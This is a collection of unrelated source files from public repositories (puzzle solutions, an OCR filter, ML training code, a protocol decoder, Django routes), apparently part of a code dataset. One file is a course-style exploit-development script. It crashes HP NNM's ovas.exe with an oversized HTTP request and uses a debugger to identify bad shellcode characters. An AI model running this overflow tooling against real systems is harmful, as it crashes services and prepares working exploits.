except http.InvalidCookieException:
print('[AoC] Invalid cookie in _session.txt. Try entering it again.')
sys.exit(1)
if input_data is None:
print('[AoC] Puzzle has not yet been unlocked. Nice try!')
sys.exit(1)
with Path(SCRIPT_DIR, 'input.txt').open('w+') as file:
file.write(input_data)
print('[AoC] Successfully downloaded input data.')
print()
print('-------- Advent of Code --------')
print(f'Solution for Dec {PUZZLE_DAY}, {PUZZLE_YEAR}')
print('--------------------------------')
print()
| DismissedGuy/AdventOfCode | aoc/__init__.py | __init__.py | py | 2,327 | python | en | code | 1 | github-code | 50 |
39856574480 | """
Given a 2D integer array matrix, return the transpose of matrix.
The transpose of a matrix is the matrix flipped over its main diagonal, switching the matrix's row and column indices.
Example 1:
Input: matrix = [[1,2,3],[4,5,6],[7,8,9]]
Output: [[1,4,7],[2,5,8],[3,6,9]]
Example 2:
Input: matrix = [[1,2,3],[4,5,6]]
Output: [[1,4],[2,5],[3,6]]
Constraints:
m == matrix.length
n == matrix[i].length
1 <= m, n <= 1000
1 <= m * n <= 105
-109 <= matrix[i][j] <= 109
"""
class Solution:
def transpose(self, matrix: [[int]]) -> [[int]]:
final = []
for i in range(len(matrix[0])):
index = 0
another = []
while index < len(matrix):
another.append(matrix[index][i])
index += 1
final.append(another)
return final | ramogi4960/Leetcode-problems | easy/Transpose Matrix.py | Transpose Matrix.py | py | 828 | python | en | code | 0 | github-code | 50 |
13073056978 | #!/usr/bin/env python3
import os
for i in range(5000,10000,10):
os.system("python3 longList.py " + str(i))
os.system("TIMEFORMAT=%R")
time = os.system("time java SortsRunner list.txt")
f = open("selection.txt", "a+")
f.write(str(time))
if i == 5020:
break
| smjaques/Java | asgn1/runTimes.py | runTimes.py | py | 290 | python | en | code | 0 | github-code | 50 |
29331952171 | import cv2
import numpy as np
from .ocr_redaction import OCR
from .speech_filter import hate_speech_detection
import pytesseract
pytesseract.pytesseract.tesseract_cmd = r'C:\Program Files\Tesseract-OCR\tesseract.exe'
def content_filtering(image = '../relay/img/screen.png'):
east = 'text/data/frozen_east_text_detection.pb' # path to input EAST text detector
extractor = OCR(east)
# Inputs
confidence = 0.5 # minimum probability required to inspect a region
width = 320 # resized image width (should be multiple of 32)
height = 320 # resized image height (should be multiple of 32)
display = False # Display bounding boxes
numbers = False # Detect only numbers
percentage = 2.0 # Expand/shrink detected bound box
min_boxes = 1 # minimum number of detected boxes to return
max_iterations = 20 # max number of iterations finding min_boxes
ocr_data, size = extractor.get_image_text(
image,
width,
height,
display,
numbers,
confidence,
percentage,
min_boxes,
max_iterations)
texts = ocr_data['text'] # ocr_data.keys()
left = ocr_data['left']
top = ocr_data['top']
width_ocr = ocr_data['width']
height_ocr = ocr_data['height']
band = True
print(texts)
loaded_image = cv2.imread(image)
mask= np.zeros((loaded_image.shape[0], loaded_image.shape[1], 3), np.uint8)
mask=np.where(mask==0, 255, mask)
orig_boxes = [[left[i], top[i], left[i]+width_ocr[i], top[i]+height_ocr[i]] for i in range(len(left))]
box_proportions = [[left[i]/size[0], top[i]/size[1], (left[i]+width_ocr[i])/size[0], (top[i]+height_ocr[i])/size[1]] for i in range(len(left))]
reshaped_boxes = [[int(box[0]*loaded_image.shape[1]), int(box[1]*loaded_image.shape[0]), int(box[2]*loaded_image.shape[1]), int(box[3]*loaded_image.shape[0])] for box in box_proportions]
# words to filter out; can replace with topical model / fake news detection model
# blacklist = [s.lower() for s in ['COVID-19', 'Trump', 'Queen']]
blacklist = [s.lower() for s in hate_speech_detection(texts)]
trigger = False; counter = 0;
for start_X, start_Y, end_X, end_Y in reshaped_boxes:
if texts[counter].lower() in blacklist:
trigger = True
# color the word only
if band == False:
cv2.rectangle(mask, (start_X, start_Y), (end_X, end_Y), (0, 255, 0), 2)
if band == True:
cv2.rectangle(mask, (0, start_Y), (loaded_image.shape[0], end_Y), (0, 0, 0), -1)
trigger = False
counter+=1
return mask, reshaped_boxes
| greaseuniverse/greaseterminator | interventions/text/text_filter.py | text_filter.py | py | 2,942 | python | en | code | 1 | github-code | 50 |
26255921148 | """Create a ChatVectorDBChain for question/answering."""
from langchain.callbacks.base import AsyncCallbackManager
from langchain.callbacks.tracers import LangChainTracer
from langchain.chains import ChatVectorDBChain
from langchain.chains.chat_vector_db.prompts import (CONDENSE_QUESTION_PROMPT,
QA_PROMPT)
from langchain.chains.llm import LLMChain
from langchain.chains.question_answering import load_qa_chain
from langchain.llms import OpenAI
from langchain.vectorstores.base import VectorStore
from langchain.prompts.prompt import PromptTemplate
prompt = """Given the following conversation and a follow up question, rephrase the follow up question to be a standalone question.
You are FixBot, a repair bot that can answer questions about fixing things using information from iFixit, the free repair guide for every thing.
Use the following pieces of context to answer the user's question.
If you don't know the answer, just say that you don't know, don't try to make up an answer. Do not make up links or sources.
Where possible, direct the user to buy a part from iFixit.
Assume the user is going to perform the repair themselves. Do not recommend an authorized repair service or manufacturer repair options.
If asked how to perform a task, tell the user that you recommend they follow the full repair guide and not your instructions. Then provide a short summary of the repair guide and link to it.
Your output should always be plain text. Do not use markdown or wiki markup.
ALWAYS return a "SOURCES" part in your answer.
The "SOURCES" part should be a reference to the source of the document from which you got your answer.
Chat History:
{chat_history}
Follow Up Input: {question}
Standalone question:"""
prompt = PromptTemplate.from_template(prompt)
def get_chain(
vectorstore: VectorStore, question_handler, stream_handler, tracing: bool = False
) -> ChatVectorDBChain:
"""Create a ChatVectorDBChain for question/answering."""
# Construct a ChatVectorDBChain with a streaming llm for combine docs
# and a separate, non-streaming llm for question generation
manager = AsyncCallbackManager([])
question_manager = AsyncCallbackManager([question_handler])
stream_manager = AsyncCallbackManager([stream_handler])
if tracing:
tracer = LangChainTracer()
tracer.load_default_session()
manager.add_handler(tracer)
question_manager.add_handler(tracer)
stream_manager.add_handler(tracer)
question_gen_llm = OpenAI(
temperature=0,
verbose=True,
callback_manager=question_manager,
)
streaming_llm = OpenAI(
streaming=True,
callback_manager=stream_manager,
verbose=True,
temperature=0,
)
question_generator = LLMChain(
llm=question_gen_llm, prompt=prompt, callback_manager=manager
)
doc_chain = load_qa_chain(
streaming_llm, chain_type="stuff", prompt=QA_PROMPT, callback_manager=manager
)
qa = ChatVectorDBChain(
vectorstore=vectorstore,
combine_docs_chain=doc_chain,
question_generator=question_generator,
callback_manager=manager,
)
return qa
| kpister/prompt-linter | data/scraping/repos/iFixit~chat/query_data.py | query_data.py | py | 3,228 | python | en | code | 0 | github-code | 50 |
42725712340 | import os
import time
import datetime
import pandas as pd
from sklearn.tree import DecisionTreeClassifier
# Compute the number of transactions per day, fraudulent transactions per day and fraudulent cards per day
def get_tx_stats(transactions_df, start_date_df="2020-04-01"):
# Number of transactions per day
nb_tx_per_day = transactions_df.groupby(
['TX_TIME_DAYS'])['CUSTOMER_ID'].count()
# Number of fraudulent transactions per day
nb_fraudulent_transactions_per_day = transactions_df.groupby(['TX_TIME_DAYS'])[
'TX_FRAUD'].sum()
# Number of compromised cards per day
nb_compromised_cards_per_day = transactions_df[transactions_df['TX_FRAUD'] == 1].groupby(
['TX_TIME_DAYS']).CUSTOMER_ID.nunique()
tx_stats = pd.DataFrame({"nb_tx_per_day": nb_tx_per_day,
"nb_fraudulent_transactions_per_day": nb_fraudulent_transactions_per_day,
"nb_compromised_cards_per_day": nb_compromised_cards_per_day})
tx_stats = tx_stats.reset_index()
start_date = datetime.datetime.strptime(start_date_df, "%Y-%m-%d")
tx_date = start_date+tx_stats['TX_TIME_DAYS'].apply(datetime.timedelta)
tx_stats['tx_date'] = tx_date
return tx_stats
def get_train_test_set(transactions_df, start_date_training, delta_train=7, delta_delay=7, delta_test=7):
# Get the training set data
train_df = transactions_df[(transactions_df.TX_DATETIME >= start_date_training) &
(transactions_df.TX_DATETIME < start_date_training+datetime.timedelta(days=delta_train))]
# Get the test set data
test_df = []
# Note: Cards known to be compromised after the delay period are removed from the test set
# That is, for each test day, all frauds known at (test_day-delay_period) are removed
# First, get known defrauded customers from the training set
known_defrauded_customers = set(
train_df[train_df.TX_FRAUD == 1].CUSTOMER_ID)
# Get the relative starting day of training set (easier than TX_DATETIME to collect test data)
start_tx_time_days_training = train_df.TX_TIME_DAYS.min()
# Then, for each day of the test set
for day in range(delta_test):
# Get test data for that day
test_df_day = transactions_df[transactions_df.TX_TIME_DAYS == start_tx_time_days_training +
delta_train+delta_delay +
day]
# Compromised cards from that test day, minus the delay period, are added to the pool of known defrauded customers
test_df_day_delay_period = transactions_df[transactions_df.TX_TIME_DAYS == start_tx_time_days_training +
delta_train +
day-1]
new_defrauded_customers = set(
test_df_day_delay_period[test_df_day_delay_period.TX_FRAUD == 1].CUSTOMER_ID)
known_defrauded_customers = known_defrauded_customers.union(
new_defrauded_customers)
test_df_day = test_df_day[~test_df_day.CUSTOMER_ID.isin(
known_defrauded_customers)]
test_df.append(test_df_day)
test_df = pd.concat(test_df)
# Sort data sets by ascending order of transaction ID
train_df = train_df.sort_values('TRANSACTION_ID')
test_df = test_df.sort_values('TRANSACTION_ID')
return (train_df, test_df)
def fit_model_and_get_predictions(classifier, train_df, test_df,
input_features, output_feature="TX_FRAUD", scale=True):
# By default, scales input data
if scale:
(train_df, test_df) = scaleData(train_df, test_df, input_features)
# We first train the classifier using the `fit` method, and pass as arguments the input and output features
start_time = time.time()
classifier.fit(train_df[input_features], train_df[output_feature])
training_execution_time = time.time()-start_time
# We then get the predictions on the training and test data using the `predict_proba` method
# The predictions are returned as a numpy array, that provides the probability of fraud for each transaction
start_time = time.time()
predictions_test = classifier.predict_proba(test_df[input_features])[:, 1]
prediction_execution_time = time.time()-start_time
predictions_train = classifier.predict_proba(
train_df[input_features])[:, 1]
# The result is returned as a dictionary containing the fitted models,
# and the predictions on the training and test sets
model_and_predictions_dictionary = {'classifier': classifier,
'predictions_test': predictions_test,
'predictions_train': predictions_train,
'training_execution_time': training_execution_time,
'prediction_execution_time': prediction_execution_time
}
return model_and_predictions_dictionary
| redhat-partner-ecosystem/fsi-fraud-detection | notebooks/simulator/training.py | training.py | py | 5,086 | python | en | code | 0 | github-code | 50 |
24327575818 | lines = int(input())
table = [input().split() for i in range(lines)]
rot90 = [[0 for j in range(lines)] for i in range(lines)]
rot180 = [[0 for j in range(lines)] for i in range(lines)]
rot270 = [[0 for j in range(lines)] for i in range(lines)]
testList = []
testTwo = []
correctNow = True
correct270 = True
correct180 = True
correct90 = True
whichOne = ""
#for rotating 360
#check if correct
for i in range(1, len(table)):
if int(table[i][0]) < int(table[i - 1][0]):
correctNow = False
for i in range(0, len(table)):
for j in range(1, len(table[i])):
if int(table[i][j]) < int(table[i][j -1]):
correctNow = False
if correctNow == True:
for i in range(0, len(table)):
for j in range(0, len(table[i])):
if j == lines - 1:
print(table[i][j], end="")
else:
print(table[i][j], end=" ")
print()
#exit()
#for rotating 270
for i in reversed(range(len(table))):
for j in range(len(table)):
rot270[len(table) - 1 - j][i] = int(table[i][j])
#check if correct
for i in range(1, len(rot270)):
if rot270[i][0] < rot270[i - 1][0]:
correct270 = False
for i in range(0, len(rot270)):
for j in range(1, len(rot270[i])):
if rot270[i][j] < rot270[i][j -1]:
correct270 = False
if correct270 == True:
for i in range(0, len(rot270)):
for j in range(0, len(rot270[i])):
if j == lines - 1:
print(rot270[i][j], end="")
else:
print(rot270[i][j], end=" ")
print()
#exit()
#for rotating 180
for i in reversed(range(len(table))):
for j in reversed(range(len(table))):
rot180[len(table) - 1 - i][len(table) - 1 - j] = int(table[i][j])
#check if correct
for i in range(1, len(rot180)):
if rot180[i][0] < rot180[i - 1][0]:
correct180 = False
for i in range(0, len(rot180)):
for j in range(1, len(rot180[i])):
if rot180[i][j] < rot180[i][j - 1]:
correct180 = False
if correct180 == True:
for i in range(0, len(rot180)):
for j in range(0, len(rot180[i])):
if j == lines - 1:
print(rot180[i][j], end="")
else:
print(rot180[i][j], end=" ")
print()
#exit()
#for rotating 90
for i in reversed(range(len(rot270))):
for j in reversed(range(len(rot270))):
rot90[len(rot270) - 1 - i][len(rot270) - 1 - j] = int(rot270[i][j])
# check if correct
for i in range(1, len(rot90)):
if rot90[i][0] < rot90[i - 1][0]:
correct90 = False
for i in range(0, len(rot90)):
for j in range(1, len(rot90[i])):
if rot90[i][j] < rot90[i][j - 1]:
correct90 = False
if correct90 == True:
for i in range(0, len(rot90)):
for j in range(0, len(rot90[i])):
if j == lines - 1:
print(rot90[i][j], end="")
else:
print(rot90[i][j], end=" ")
print()
#exit()
'''
for i in range(0, len(rot90)):
for j in range(0, len(rot90[i])):
if j == lines - 1:
print(rot180[i][j], end="")
else:
print(rot180[i][j], end=" ")
print()
for i in range(0, len(rot180)):
for j in range(0, len(rot90[i])):
if j == lines - 1:
print(rot180[i][j], end="")
else:
print(rot180[i][j], end=" ")
print()
for i in range(0, len(rot270)):
for j in range(0, len(rot90[i])):
if j == lines - 1:
print(rot180[i][j], end="")
else:
print(rot180[i][j], end=" ")
print()
''' | vishnupsatish/CCC-practice | 2018/J4/J4.py | J4.py | py | 3,620 | python | en | code | 1 | github-code | 50 |
18727794630 | from django.conf.urls import url
from .views import event, login, profile, friends
urlpatterns = [
url(r'^api/event', event, name='event'),
url(r'^api/login', login, name='login'),
url(r'^api/profile', profile, name='profile'),
url(r'^api/friends', friends, name='friends')
]
| stanislavBozhanov/hello | hello_back_end/helloers/urls.py | urls.py | py | 295 | python | en | code | 0 | github-code | 50 |
29473290269 | __author__ = 'srkiyengar'
import os
import logging.handlers
scriptname = os.path.basename(__file__)
LOG_LEVEL = logging.INFO
# Set up a logger with output level set to debug; Add the handler to the logger
my_logger = logging.getLogger("UR5_Logger")
my_dir = "../trials"
class match:
def __init__(self,dname):
# create directories if they don't exisit
if not os.path.exists(dname):
my_logger.info("{}:The directory {} does not exist".format(scriptname,dname))
self.success = False
else:
self.success = True
self.dname = dname
self.ur5_files = []
self.npy_files = []
self.id = []
def pickup_files(self):
# read files from raw_data directory
a = os.walk(self.dname)
all_files = a.next()[2]
for name in all_files:
if "ur5" in name:
self.ur5_files.append(name)
elif "npy" in name and "color" in name:
self.npy_files.append(name)
return
def pair_files(self):
for name in self.ur5_files:
for image_file in self.npy_files:
if name[0:6] == image_file[0:6]:
self.id.append(name[0:6])
break
return
if __name__ == "__main__":
a = match(my_dir)
a.pickup_files()
a.pair_files()
print(a.id)
| srkiyengar/ur5_client | src/match.py | match.py | py | 1,410 | python | en | code | 1 | github-code | 50 |
36795359974 | import sigrokdecode as srd
import binascii
import struct
import traceback
from .handlers import *
# ...
RX = 0
TX = 1
# these reflect the implicit IDs for the 'annotations' variable defined below.
# if you renumber 'annotations', you'll have to change these to match.
ANN_MESSAGE = 0
ANN_ERROR = 1
ANN_BYTES = 2
class Decoder(srd.Decoder):
api_version = 3
id = 'boost'
name = 'Boost'
longname = 'LEGO Boost'
desc = 'LEGO Boost Hub and Peripherals.'
license = 'gplv2+'
inputs = ['uart']
outputs = ['boost']
options = (
{'id': 'show_errors', 'desc': 'Show errors?', 'default': 'no', 'values': ('yes', 'no')},
{'id': 'show_bytes', 'desc': 'Show message bytes?', 'default': 'no', 'values': ('yes', 'no')}
)
annotations = (
('messages', 'Valid messages that pass checksum'),
('errors', 'Invalid/malformed messages'),
('bytes', 'Each individual byte'),
)
annotation_rows = (
('messages', 'Messages', (ANN_MESSAGE,) ),
('errors', 'Errors', (ANN_ERROR,) ),
('bytes', 'Bytes', (ANN_BYTES,) )
)
def __init__(self):
self.reset()
def reset(self):
self.message = [[], []]
self.ss_block = [None, None]
self.es_block = [None, None]
def start(self):
self.out_ann = self.register(srd.OUTPUT_ANN)
def putx(self, rxtx, data, ss=None, es=None):
if(not ss):
ss = self.ss_block[rxtx]
if(not es):
es = self.es_block[rxtx]
if(data[0] == ANN_ERROR and self.options['show_errors'] == 'no'):
return
if(data[0] == ANN_BYTES and self.options['show_bytes'] == 'no'):
return
self.put(ss, es, self.out_ann, data)
def decode(self, ss, es, data):
ptype, rxtx, pdata = data
# For now, ignore all UART packets except the actual data packets.
if ptype != 'DATA':
return
# We're only interested in the byte value (not individual bits).
pdata = pdata[0]
# If this is the start of a command/reply, remember the Start Sample number.
if self.message[rxtx] == []:
self.ss_block[rxtx] = ss
# Append a new byte to the currently built/parsed command.
self.message[rxtx].append(pdata)
self.putx(rxtx, [ANN_BYTES, ['{:02X}'.format(pdata)]], ss=ss, es=es)
# note our current End Sample number.
self.es_block[rxtx] = es
# self.putx(rxtx, [0, [str(binascii.hexlify(bytes(self.message[rxtx])))]])
# will return something if message is complete, False or None if we're waiting on more bytes
if(self.handle_message(rxtx, self.message[rxtx])):
self.message[rxtx] = []
# attempt to find a handler function for this message
def handle_message(self, rxtx, msg):
# if we have a handler available for this message type, use it
try:
funcname = 'handle_message_{:02X}'.format(msg[0])
# func = getattr(handlers, funcname)
func = globals()[funcname]
# print(funcname, func)
res = func(msg)
# print(res)
if(res):
self.putx(rxtx, res)
return True
return False
except Exception as e:
pass
# no handler found.
# we don't want to handle this message again, so return True to consume it
return True
| dracode/sigrok-lego-boost | boost/pd.py | pd.py | py | 3,482 | python | en | code | 3 | github-code | 50 |
22006232249 | #.CSV(Comma Seperated Values file)
#is atype of plain text file that uses specific structuring to arrange tabular data
#because its a plain text file, it can contain only actual text data(printable ASCII or Unicode) characters.
#.CSV file uses a comma to separate each specifc data value
#CSV files are created by programs that handle large amounts of data
#there are convinient way to export data from spreadsheets and databases as well as import or use it in other programs
#eg u can export the results of a data mining program to a CSV file and then import that into a spreadsheet to analyze the data
#generate graphs for a presentation, or prepare a report for publication
import csv
with open('employee_file.csv', mode='w') as employee_file:
employee_writer = csv.writer(employee_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
#If quoting is set to csv.QUOTE_MINIMAL, then .writerow() will quote fields only if they contain the delimiter or the quotechar. This is the default case.
#If quoting is set to csv.QUOTE_ALL, then .writerow() will quote all fields.
#If quoting is set to csv.QUOTE_NONNUMERIC, then .writerow() will quote all field containing text data and convert all numeric fields to the float data type
#If quoting is set to csv.QUOTE_NONE, then .writerow() will escape delimiters instead of quoting them. In this case, you also must provide a value for the escapechar optional parameter.
employee_writer.writerow(['Dennis Mwangi', 'Developer','November'])
employee_writer.writerow(['Vinicent Opiyo', 'Agile', 'February']) | DENNIS-CODES/Python-csvFiles | file.py | file.py | py | 1,573 | python | en | code | 1 | github-code | 50 |
23393766489 | from torch import nn
import torch.nn.functional as F
from torch_geometric.nn import SAGEConv
from key_info_extraction.utils import ID2LABEL
class SageNet(nn.Module):
def __init__(self, in_channels, n_classes=len(ID2LABEL.keys()), dropout_rate=0.2, bert_model='vinai/phobert-base',
device='cuda'):
super(SageNet, self).__init__()
self.conv1 = SAGEConv(in_channels=in_channels, out_channels=64)
self.relu1 = nn.ReLU()
self.conv2 = SAGEConv(in_channels=64, out_channels=32)
self.relu2 = nn.ReLU()
self.conv3 = SAGEConv(in_channels=32, out_channels=16)
self.relu3 = nn.ReLU()
self.conv4 = SAGEConv(in_channels=16, out_channels=n_classes)
self.dropout_rate = dropout_rate
def forward(self, data):
edge_index, edge_weight = data.edge_index, data.edge_attr
x = F.dropout(self.relu1(self.conv1(data.embedding, edge_index, edge_weight)), p=self.dropout_rate)
x = F.dropout(self.relu2(self.conv2(x, edge_index, edge_weight)), p=self.dropout_rate)
x = F.dropout(self.relu3(self.conv3(x, edge_index, edge_weight)), p=self.dropout_rate)
x = self.conv4(x, edge_index, edge_weight)
return x
| manhph2211/MC-OCR | key_info_extraction/models/phobert_sage.py | phobert_sage.py | py | 1,228 | python | en | code | 26 | github-code | 50 |
37344733255 | '''
Crie um programa que leia o nome de uma cidade diga se ela começa ou não com o nome "SANTO".
'''
cidade=str(input('Digite o nome de uma cidade: '))
cidade2=cidade.upper()
ini=cidade2.find('SANTO')
print(ini)
if ini==0:
print('\nO primeiro nome da cidade é Santo')
elif ini==-1:
print('\nPalavra não existe')
else:
print('\nO primeiro nome da cidade NÃO é Santo')
| igorbalbino/Estudos-Python | VerificandoLetrasDoTexto.py | VerificandoLetrasDoTexto.py | py | 390 | python | pt | code | 0 | github-code | 50 |
73799333915 | #!/usr/bin/env python2
# reference: CTP/OSCE
# author: greyshell
# description: identify good and bad chars in HPNNM-B.07.53
# dependency: python version: 2.7.x, pyenv-win==1.2.2, pywin32==218, WMI==1.4.9, pydbg
# 1) download the `dependency.zip` file.
# 2) extract the `pydbg.zip` inside your python `lib\site-packages` directory.
# 3) install `pywin32-218.win32-py2.7.exe` and `WMI-1.4.9.win32.exe`.
import os
import socket
import subprocess
import threading
import time
import wmi
from pydbg import *
from pydbg.defines import *
# global variables
all_chars = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
request_template = (
"GET /topology/homeBaseView HTTP/1.1\r\n"
"Host: {}\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
"Content-Length: 1048580\r\n\r\n"
)
# current char that is being checked
cur_char = ""
bad_chars = []
good_chars = []
evil_str_sent = False
service_is_running = False
def chars_to_str(chars):
# convert a list of chars to a string
result = ""
for char in chars:
result += "\\x{:02x}".format(ord(char))
return result
def crash_service():
# send malformed data to ovas service in order to crash it. function runs in an independent thread
global evil_str_sent, cur_char, bad_chars, good_chars, all_chars
global service_is_running
char_counter = -1
timer = 0
while True:
# don't send evil string if process is not running
if not service_is_running:
time.sleep(1)
continue
# if main loop reset the evil_str_sent flag to False, sent evil_str again
if not evil_str_sent:
timer = 0
char_counter += 1
if char_counter > len(all_chars) - 1:
print("[+] bad chars: {}.".format(chars_to_str(bad_chars)))
print("[+] good chars: {}.".format(chars_to_str(good_chars)))
print("[+] done.")
# hack to exit application from non-main thread
os._exit(0)
cur_char = all_chars[char_counter]
# during crash [ESP + 4C] points to ("A" * 1025)th position
crash = "A" * 1025 + cur_char * 4 + "B" * 2551
evil_str = request_template.format(crash)
print("[+] sending evil HTTP request...")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 7510))
sock.send(evil_str)
sock.close()
except Exception as e:
print("[+] error sending malicious buffer, service may be down.")
print("[+] restarting the service and retrying...")
print(e)
service_is_running = False
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
finally:
evil_str_sent = True
else:
if timer > 10:
print("[+] 10 seconds passed without a crash. Bad char probably prevented the crash.")
print("[+] marking last char as bad and killing the service...")
bad_chars.append(cur_char)
print("[+] bad chars so far: {}.".format(chars_to_str(bad_chars)))
with open("bad_chars.txt", 'w') as f:
f.write(chars_to_str(bad_chars))
service_is_running = False
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
time.sleep(1)
timer += 1
return
def is_service_started():
# check if service was successfully started
print("[+] making sure the service was restarted...")
service_check_counter = 0
while not service_is_running:
if service_check_counter > 4: # give it 5 attempts
return False
for process in wmi.WMI().Win32_Process():
if process.Name == 'ovas.exe':
return process.ProcessId
service_check_counter += 1
time.sleep(1)
def is_service_responsive():
# check if service responds to HTTP requests
print("[+] making sure the service responds to HTTP requests...")
service_check_counter = 0
while not service_is_running:
# give it 5 attempts
if service_check_counter > 4:
return False
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 7510))
test_str = request_template.format("127.0.0.1")
sock.send(test_str)
# give response 1 second to arrive
sock.settimeout(1.0)
resp = sock.recv(1024)
if resp:
return True
sock.close()
except Exception as e:
print(e)
service_check_counter += 1
def restart_service():
# restart ovas.exe service and return its PID
global service_is_running
service_is_running = False
# check that the service is running before stopping it
for process in wmi.WMI().Win32_Process():
if process.Name == 'ovas.exe':
print("[+] stopping the service...")
# forcefully terminate the process
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
print("[+] starting the service...")
# start the process with reliability
subprocess.Popen('ovstop -c ovas').communicate()
subprocess.Popen('ovstart -c ovas').communicate()
pid = is_service_started()
if pid:
print("[+] the service was restarted.")
else:
print("[-] service was not found in process list. Restarting...")
return restart_service()
if is_service_responsive():
print("[+] service responds to HTTP requests. Green ligth.")
service_is_running = True
return pid
else:
print("[-] service does not respond to HTTP requests. Restarting...")
return restart_service()
def check_char(raw_data):
# compare the buffer sent with the one in memory to see if it has been mangled in order to identify bad characters.
global bad_chars, good_chars
hex_data = dbg.hex_dump(raw_data)
print("[+] buffer: {}".format(hex_data))
# sent data must be equal to data in memory
if raw_data == (cur_char * 4):
good_chars.append(cur_char)
print("[+] char {} is good.".format(chars_to_str(cur_char)))
print("[+] good chars so far: {}.".format(chars_to_str(good_chars)))
with open("good_chars.txt", 'w') as f:
f.write(chars_to_str(good_chars))
else:
bad_chars.append(cur_char)
print("[+] char {} is bad.".format(chars_to_str(cur_char)))
print("[+] bad chars so far: {}.".format(chars_to_str(bad_chars)))
with open("bad_chars.txt", 'w') as f:
f.write(chars_to_str(bad_chars))
return
def _access_violation_handler(dbg):
# on access violation read data from a pointer on the stack to determine if the sent buffer was mangled in any way
print("[+] Access violation caught.")
# [ESP + 0x4C] points to our test buffer
esp_offset = 0x4C
buf_address = dbg.read(dbg.context.Esp + esp_offset, 0x4)
buf_address = dbg.flip_endian_dword(buf_address)
print("[+] [DEBUG] buf_address: {}".format(buf_address))
if buf_address:
# read 4 bytes test buffer
buffer = dbg.read(buf_address, 0x4)
print("[+] buffer is " + buffer)
else:
# now when the first request sent is the one for checking if the
# service responds, the buf_address sometimes returns 0. This is to
# handle that case.
buffer = ""
print("[+] checking whether the char is good or bad...")
check_char(buffer)
dbg.detach()
return DBG_EXCEPTION_NOT_HANDLED
def debug_process(pid):
# create a debugger instance and attach to ovas PID"""
dbg = pydbg()
dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, _access_violation_handler)
while True:
try:
print("[+] attaching debugger to pid: {}.".format(pid))
if dbg.attach(pid):
return dbg
else:
return False
except Exception as e:
print("[+] error while attaching: {}.".format(e.message))
return False
if __name__ == '__main__':
# create and start crasher thread
crasher_thread = threading.Thread(target=crash_service)
crasher_thread.setDaemon(0)
crasher_thread.start()
print("[+] thread started")
# main loop
while True:
pid = restart_service()
print("[+] restart_service " + str(pid))
dbg = debug_process(pid)
print("[+] dbg started")
if dbg:
# tell crasher thread to send malicious input to process
evil_str_sent = False
# enter the debugging loop
dbg.run()
| bigb0sss/OSCE | hp_nnm7.5/bad_char.py | bad_char.py | py | 10,022 | python | en | code | 74 | github-code | 50 |
42577913058 |
from queue import PriorityQueue
import bisect
import sys
class Solution:
def coinChange(self, coins, amount):
q = PriorityQueue()
q.put((0, (0,0)))
if amount in coins:
return 1
while not q.empty():
sys.stdout.write(f"L-> {q.qsize()}... ")
sys.stdout.flush()
priority, element = q.get()
sum1, steps = element
if sum1 == amount:
return steps
for x in range(len(coins) ):
if (amount-sum1)>=coins[x]:
ns=steps+1
q.put((ns, ( sum1+(coins[x]), ns)))
return -1
# print(Solution().coinChange([1,2,5],11))
print(Solution().coinChange([186,419,83,408],6249))
print(Solution().coinChange([1,2,5,10],18)) | RamonRomeroQro/ProgrammingPractice | code/generating-paths.py | generating-paths.py | py | 821 | python | en | code | 1 | github-code | 50 |
29775654337 | # ID-Fits
# Copyright (c) 2015 Institut National de l'Audiovisuel, INA, All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3.0 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library.
import numpy as np
class ScoresAccumulator:
def __init__(self, max_size=int(1e3)):
self.accumulator = {}
self.max_size = max_size
self.width = 20
self.kernel = self._gaussian_kernel(np.arange(self.width, self.width+1), sigma=10.0)
def _gaussian_kernel(self, r, sigma):
